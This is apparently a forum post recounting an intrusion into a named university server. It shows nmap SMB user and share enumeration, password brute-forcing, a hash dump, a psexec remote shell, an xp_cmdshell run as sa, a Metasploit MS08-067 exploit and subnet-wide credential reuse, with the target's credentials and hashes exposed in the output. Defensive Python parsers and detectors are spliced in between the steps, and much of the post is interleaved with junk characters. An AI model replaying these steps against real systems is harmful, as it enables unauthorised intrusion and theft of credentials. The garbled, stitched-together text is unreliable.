nmap + msf intrusion of Guangxi Normal University

Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241    // use the script to enumerate the account names that exist on the remote machine
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241    // list the shares
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
7 `: j1 i) J. k/ n
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       . C( m# l' E9 L- F

; x9 D! S# @# G" b2 A! _//获取用户密码, S  W' |; k2 F# U5 ~9 ~6 |+ E
$ ^; ~  w; J/ E# e( e. q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST. W( S0 i; b% V: y8 g  J

$ h. @$ e2 H* L9 b; ^( a8 JNmap scan report for bogon (202.103.242.2418)! n' s# c/ d: B/ A* ~! H' a
- _: ]2 D& N0 I
Host is up (0.00041s latency).# G1 Y# a/ Q* g

: l6 w1 {6 y% J7 rNot shown: 993 closed ports
, T/ M1 y9 q# R; Q
- }/ @9 F1 j& ~& L2 ]PORT     STATE SERVICE
6 a7 k' m/ y6 N5 A0 [! S; g- ]3 d  K9 c$ y
135/tcp  open  msrpc
, a% |. x7 v" Z& \- D
# ?( M1 R3 B# I* W3 S* w0 N139/tcp  open  netbios-ssn
6 s0 L4 O: z# z4 p7 c0 B
7 _# K' t' R  b5 h0 R445/tcp  open  microsoft-ds
0 U: {* _% C4 L, l' C% q3 q' ]  g' h) @
1025/tcp open  NFS-or-IIS
% ^% x4 v# @' D! s8 s3 T2 ~$ R9 I" e
1026/tcp open  LSA-or-nterm
9 C: o) n( V" r0 X
8 C9 i2 q- J  q5 N3372/tcp open  msdtc
( F( n  O2 U$ Z) R7 p) f3 K4 f, g" }/ E+ L
3389/tcp open  ms-term-serv+ ^: b' E" c8 n  Q) J9 {7 B

. O( D1 @& W: ]9 B5 l% jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! g% @+ U6 ^" V7 ]1 H% H* a9 G: u. f" n' t' I2 v4 U' z! @$ F( X& @
Host script results:: H. q# N- l. z! V

9 {0 {* t. ]0 R9 y4 a5 l| smb-brute:* _* S0 p; W% S/ {4 a2 O1 P- {

) \8 L" [6 l0 ]! g* cadministrator:<blank> => Login was successful, m; ?' C6 j  ?: q

* w; H- i0 u5 D& _% H|_  test:123456 => Login was successful. e2 g+ k3 }# g
* [1 V' I) z& M2 p
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
7 {) Q( W' I. p- z* \
3 C' j2 r* {3 w0 |) S* G$ xroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
! c, ?! Q1 u! y/ N' n' |4 }; _! M. A' [  J) N5 H
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
' f4 h0 x! T, Q+ v+ I7 M2 P* e$ v2 [/ Q& A/ g$ w
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse9 i3 M8 _3 ^, V: o

2 v; l3 \( ]9 R, p. M1 \root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
: y. E- @' r6 y$ G- F0 I) M- d% }$ \" O1 R, _4 R+ ]$ n
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST) @3 q5 _' q0 @5 Q

4 p! L" J+ ]1 I- @7 ~" U0 ONmap scan report for bogon (202.103.242.241)
' f' c- t% u0 K' ^, K8 A/ v! ^( H) G5 D, l% Y. [1 p
Host is up (0.0012s latency).% ]- G* T1 G' D; g

* ^9 p+ E2 A& h. h. H2 l' T3 WPORT    STATE SERVICE
1 o5 f9 y& w% i/ N& q9 Q. P! I  g6 `. t. ^
135/tcp open  msrpc
8 j% @, q5 K+ ^0 U( x5 F% ^& R% |5 D0 {5 @8 }) n7 ?
139/tcp open  netbios-ssn
) f; `7 K3 ?1 M1 t% y
! L" Z" ^5 e1 K445/tcp open  microsoft-ds) Q7 i8 [# q  q9 W  v1 U6 h7 N) `9 u

4 I$ [2 S% Z' O* B4 L! `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* |% K% L) o8 e7 V# R! \: w0 x: B; \# V/ d2 T6 l$ r5 G) N
Host script results:
9 ]. f/ [! t4 T- {1 k: Q# b
% \0 N' [4 D( b% W2 _1 ]| smb-pwdump:5 [% ~' c3 l3 d6 X+ e" k& T/ D( l

1 T8 ~& l6 j8 M) h5 J; b  P( \+ P  || Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************/ ~5 m2 t" R! q3 K) O  E

  {# G+ G, e5 I+ M2 J2 P( R. ?; n| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
: R# \- ^; L9 l# |
8 \: D1 R. y4 g! q9 C$ i5 m* F| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
! {+ b4 ~7 F/ P$ q- @* t; a! W
5 h7 |6 q2 Z2 [6 a; }0 j|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D28 t  s6 d7 b9 j, Z  @" v* h
1 Q) i  @5 g: `- U
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds  @) t( t# |& C
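The smb-pwdump lines above carry an LM hash and an NT hash for every account, and they say a lot about the host's password hygiene before anyone touches a cracker: an NT hash equal to the empty-password hash (or the NO PASSWORD marker) means a blank password, a non-empty LM hash means the host still stores LM hashes, and an LM hash whose second half is the empty-half constant AAD3B435B51404EE means the password is at most 7 characters long. The audit script below is an added example, not code from the post; the sample lines are copied from the output above, and the constants are the well-known hashes of the empty password.

```python
"""Audit a pwdump-style hash listing (the smb-pwdump layout above) for weak
password storage.  Added example, not code from the post."""
import re
from dataclasses import dataclass, field

# Well-known hashes of the empty password.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_LM_HALF = "AAD3B435B51404EE"   # LM hash of an empty 7-byte half
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# smb-pwdump prints "user:rid => LM:NT" behind a "| " or "|_" gutter.
LINE_RE = re.compile(
    r"^\|?_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+?)\s*$")

# Sample copied from the smb-pwdump output above.
SAMPLE = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""


@dataclass
class Finding:
    user: str
    rid: int
    issues: list = field(default_factory=list)


def _normalise(h, empty):
    """Map pwdump's 'NO PASSWORD***' marker onto the real empty-password hash."""
    h = h.strip().upper()
    return empty if h.startswith("NO PASSWORD") else h


def audit_line(line):
    """Return a Finding for one account line, or None if the line is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    lm = _normalise(m["lm"], EMPTY_LM)
    nt = _normalise(m["nt"], EMPTY_NT)
    f = Finding(m["user"].strip(), int(m["rid"]))
    if nt == EMPTY_NT:
        f.issues.append("blank password")
        if f.rid == 500:
            f.issues.append("built-in Administrator (RID 500) has no password")
    elif lm != EMPTY_LM:
        # The LM hash survives only when NoLMHash is not enforced; its second
        # half equals the empty-half constant when the password is <= 7 chars.
        f.issues.append("LM hash stored (NoLMHash not enforced)")
        if lm.endswith(EMPTY_LM_HALF):
            f.issues.append("password is 7 characters or fewer")
    return f


def audit(text):
    """Findings for every account line that has at least one issue."""
    found = (audit_line(line) for line in text.splitlines())
    return [f for f in found if f and f.issues]


if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.user} (RID {f.rid}): " + "; ".join(f.issues))
```

Run against the sample it reports the two blank-password accounts, that test's password is short enough to fall entirely in the first LM half, and that the host stores LM hashes at all, which is what the NoLMHash policy exists to stop.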

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
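Reading these reports by eye works for one host; for an audit of a whole segment you want the findings pulled out automatically. The parser below is an added example, not code from the post. It reads nmap's normal output in the layout shown above (port table followed by "Host script results") and turns the smb-enum-users, smb-enum-shares, smb-brute and smb-check-vulns sections into a triage list. The sample report is constructed to mirror the scans above; the host name host.example and the address 192.0.2.10 are placeholders.

```python
"""Turn an nmap normal-output report (the layout of the scans above) into a
triage list of findings.  Added example, not code from the post; nothing here
touches a network."""
import re

PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\w+)\s+(?P<service>\S+)")
SCRIPT_HEAD_RE = re.compile(r"^\|\s*(?P<name>[\w-]+):\s*$")   # e.g. "| smb-brute:"

# Ports whose exposure beyond the local segment is itself worth a finding.
EXPOSED = {135: "RPC endpoint mapper", 139: "NetBIOS session service",
           445: "SMB", 3389: "Remote Desktop"}

# Constructed sample report; host name and address are placeholders.
SAMPLE = """\
Nmap scan report for host.example (192.0.2.10)
Host is up (0.00041s latency).
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
Host script results:
| smb-enum-users:
|_  Domain: EXAMPLE-PC; Users: Administrator, Guest, test
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""


def parse(text):
    """Return (open_ports, scripts): open_ports maps port number to service name,
    scripts maps each host-script name to its body lines with the '|' gutter removed."""
    ports, scripts, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            if m["state"] == "open":
                ports[int(m["port"])] = m["service"]
            continue
        if not line.startswith("|"):
            current = None            # left the "Host script results" block
            continue
        m = SCRIPT_HEAD_RE.match(line)
        if m:
            current = m["name"]
            scripts[current] = []
        elif current:
            scripts[current].append(line.lstrip("|_ ").rstrip())
    return ports, scripts


def findings(text):
    """Findings as (severity, message) tuples, derived only from the report text."""
    ports, scripts = parse(text)
    out = []
    for port, label in sorted(EXPOSED.items()):
        if port in ports:
            out.append(("medium", f"{label} reachable on {port}/tcp"))
    for body in scripts.get("smb-enum-users", []):
        m = re.search(r"Users:\s*(.+)", body)
        if m:
            users = [u.strip() for u in m.group(1).split(",")]
            out.append(("medium", f"null session lists {len(users)} accounts: {', '.join(users)}"))
    share = None
    for body in scripts.get("smb-enum-shares", []):
        if body.startswith("Anonymous access:"):
            level = body.split(":", 1)[1].strip()
            if share and level != "<none>":
                out.append(("high", f"share {share} allows anonymous {level}"))
        else:
            share = body              # a share-name line precedes its access line
    for body in scripts.get("smb-brute", []):
        m = re.match(r"(?P<user>[^:]+):(?P<pw>\S+) => Login was successful", body)
        if m:
            how = "blank password" if m["pw"] == "<blank>" else "guessable password"
            out.append(("critical", f"account {m['user']} accepts a {how}"))
    for body in scripts.get("smb-check-vulns", []):
        m = re.match(r"(?P<id>MS\d{2}-\d{3}):\s*VULNERABLE", body)
        if m:
            out.append(("critical", f"missing patch {m['id']}"))
    return out


if __name__ == "__main__":
    for severity, msg in findings(SAMPLE):
        print(f"[{severity}] {msg}")
```

The share logic relies on nmap printing the share name on one line and its "Anonymous access" verdict on the next, exactly as in the smb-enum-shares output above; the critical findings (a blank or guessable password and an unpatched MS08-067) are the ones that turn a scan into a compromise in the rest of the post.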

root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254    // use the user names and the captured hash to try logging on across the whole internal subnet
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
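Every smb-brute run like the two above leaves a tight burst of failed network logons (event 4625, logon type 3) from one source address in the target's Security log, followed by a 4624 from the same source once a guess lands. The detector below is an added example, not part of the post. It scans constructed event lines in a pipe-separated layout (time|event_id|logon_type|source_ip|account|status) for such bursts and also reports when a later successful network logon matches an account that was being guessed; 192.0.2.50 and 192.0.2.77 are placeholder addresses, and the 5-failures-in-60-seconds threshold is an assumed starting point rather than a tuned value.

```python
"""Flag SMB password-guessing bursts in Windows Security log events.
Added example, not part of the post.  Each constructed event line is
time|event_id|logon_type|source_ip|account|status."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample.  4625 = failed logon, 4624 = successful logon; logon
# type 3 is a network logon, which is what SMB authentication produces.
# 0xC000006D is STATUS_LOGON_FAILURE.  Addresses are placeholders.
SAMPLE_EVENTS = """\
2012-02-28 22:17:01|4625|3|192.0.2.50|administrator|0xC000006D
2012-02-28 22:17:01|4625|3|192.0.2.50|guest|0xC000006D
2012-02-28 22:17:02|4625|3|192.0.2.50|test|0xC000006D
2012-02-28 22:17:02|4625|3|192.0.2.50|test|0xC000006D
2012-02-28 22:17:03|4625|3|192.0.2.50|test|0xC000006D
2012-02-28 22:17:04|4625|3|192.0.2.50|test|0xC000006D
2012-02-28 22:17:05|4624|3|192.0.2.50|test|0x0
2012-02-28 22:30:00|4625|3|192.0.2.77|alice|0xC000006A
2012-02-28 23:30:00|4624|2|192.0.2.77|alice|0x0
"""


def parse_events(text):
    """Parse the pipe-separated event lines into dicts, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, ltype, src, user, status = line.split("|")
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "id": int(eid), "logon_type": int(ltype),
                       "src": src, "user": user, "status": status})
    return events


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Return alerts in time order.

    ('burst', src, n)            -- n network-logon failures from src within `window`
    ('guess_succeeded', src, u)  -- a later network logon from src succeeded for an
                                    account u that was failing during the burst
    Interactive logons (type 2) and other logon types are ignored so that a
    user mistyping at the console never trips the SMB-oriented rule."""
    alerts = []
    recent = defaultdict(deque)   # src -> (time, account) of failures inside the window
    flagged = {}                  # src -> accounts seen failing once the burst was raised
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 3:
            continue
        q = recent[ev["src"]]
        while q and ev["time"] - q[0][0] > window:
            q.popleft()           # slide the window forward
        if ev["id"] == 4625:
            q.append((ev["time"], ev["user"]))
            if ev["src"] in flagged:
                flagged[ev["src"]].add(ev["user"])
            elif len(q) >= threshold:
                flagged[ev["src"]] = {u for _, u in q}
                alerts.append(("burst", ev["src"], len(q)))
        elif ev["id"] == 4624 and ev["user"] in flagged.get(ev["src"], ()):
            alerts.append(("guess_succeeded", ev["src"], ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

On the sample the burst from 192.0.2.50 is raised at the fifth failure and the success for test two seconds later is reported as a guessed credential, while alice's single failure and later console logon stay quiet. The blank administrator password found above would produce no burst at all (it succeeds on the first try), which is why the account list from smb-enum-users and the blank-password audit matter alongside the log rule.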

$ t! Y2 L: r, }$ Q2 ~3 v$ u攻击成功,一个简单的msf+nmap攻击~~·1 A7 P/ W$ U% r- B2 J% U0 m+ d  m) V
